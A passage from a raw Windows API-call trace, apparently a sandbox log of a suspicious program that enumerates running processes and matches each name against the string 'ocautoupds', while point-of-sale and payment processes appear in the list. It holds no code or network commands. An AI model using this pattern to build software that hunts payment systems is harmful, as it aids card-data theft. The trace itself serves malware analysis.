lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.476] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3571d38 [0094.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x3571d38, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0094.476] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0094.476] StrStrIA (lpFirst="winscp.exe", lpSrch="ocautoupds") returned 0x0 [0094.476] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0094.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0094.477] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x356d2c8 [0094.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x356d2c8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0094.477] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0094.477] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="ocautoupds") returned 0x0 [0094.477] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0094.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0094.479] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x356d2e8 [0094.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x356d2e8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0094.479] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0094.479] StrStrIA (lpFirst="active-charge.exe", lpSrch="ocautoupds") returned 0x0 [0094.479] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0094.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.480] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571b70 [0094.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x3571b70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0094.480] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0094.480] StrStrIA (lpFirst="accupos.exe", lpSrch="ocautoupds") returned 0x0 [0094.480] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0094.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.481] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3571be8 [0094.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x3571be8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0094.481] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0094.481] StrStrIA (lpFirst="afr38.exe", lpSrch="ocautoupds") returned 0x0 [0094.481] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0094.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.483] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3571ae0 [0094.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x3571ae0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0094.483] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0094.483] StrStrIA (lpFirst="aldelo.exe", lpSrch="ocautoupds") returned 0x0 [0094.483] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0094.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0094.484] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x3571cf0 [0094.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x3571cf0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0094.484] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0094.484] StrStrIA (lpFirst="ccv_server.exe", lpSrch="ocautoupds") returned 0x0 [0094.484] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0094.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0094.485] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x356d0e8 [0094.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x356d0e8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0094.485] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0094.485] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="ocautoupds") returned 0x0 [0094.485] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0094.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0094.487] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x356d308 [0094.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x356d308, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0094.487] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0094.487] StrStrIA (lpFirst="creditservice.exe", lpSrch="ocautoupds") returned 0x0 [0094.487] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0094.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.488] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3571c18 [0094.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x3571c18, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0094.489] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0094.489] StrStrIA (lpFirst="edcsvr.exe", lpSrch="ocautoupds") returned 0x0 [0094.489] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0094.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0094.490] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3571c60 [0094.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x3571c60, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0094.490] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0094.490] StrStrIA (lpFirst="fpos.exe", lpSrch="ocautoupds") returned 0x0 [0094.490] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0094.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.491] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3571c30 [0094.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x3571c30, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0094.491] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0094.491] StrStrIA (lpFirst="isspos.exe", lpSrch="ocautoupds") returned 0x0 [0094.491] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0094.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0094.493] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x356d328 [0094.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x356d328, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0094.493] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0094.493] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="ocautoupds") returned 0x0 [0094.493] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0094.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.494] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571b28 [0094.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x3571b28, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0094.494] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0094.494] StrStrIA (lpFirst="omnipos.exe", lpSrch="ocautoupds") returned 0x0 [0094.494] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0094.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.495] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3571b58 [0094.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x3571b58, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0094.495] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0094.495] StrStrIA (lpFirst="spcwin.exe", lpSrch="ocautoupds") returned 0x0 [0094.495] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0094.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0094.497] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x356d348 [0094.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x356d348, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0094.497] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0094.497] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="ocautoupds") returned 0x0 [0094.497] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0094.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0094.498] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3571b88 [0094.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x3571b88, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0094.498] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0094.498] StrStrIA (lpFirst="utg2.exe", lpSrch="ocautoupds") returned 0x0 [0094.498] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0094.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.499] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3571cc0 [0094.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x3571cc0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0094.500] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0094.500] StrStrIA (lpFirst="saying.exe", lpSrch="ocautoupds") returned 0x0 [0094.500] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0094.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0094.501] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3571c78 [0094.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3571c78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0094.501] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0094.501] StrStrIA (lpFirst="ripe.exe", lpSrch="ocautoupds") returned 0x0 [0094.501] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0094.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.502] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3571cd8 [0094.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x3571cd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0094.520] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0094.520] StrStrIA (lpFirst="acoustic.exe", lpSrch="ocautoupds") returned 0x0 [0094.520] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0094.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0094.521] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3571c90 [0094.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x3571c90, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0094.521] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0094.521] StrStrIA (lpFirst="mail.exe", lpSrch="ocautoupds") returned 0x0 [0094.521] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0094.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.523] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3571ca8 [0094.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3571ca8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0094.523] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0094.523] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="ocautoupds") returned 0x0 [0094.523] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.524] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571d08 [0094.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3571d08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.524] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.524] StrStrIA (lpFirst="svchost.exe", lpSrch="ocautoupds") returned 0x0 [0094.524] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0094.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, 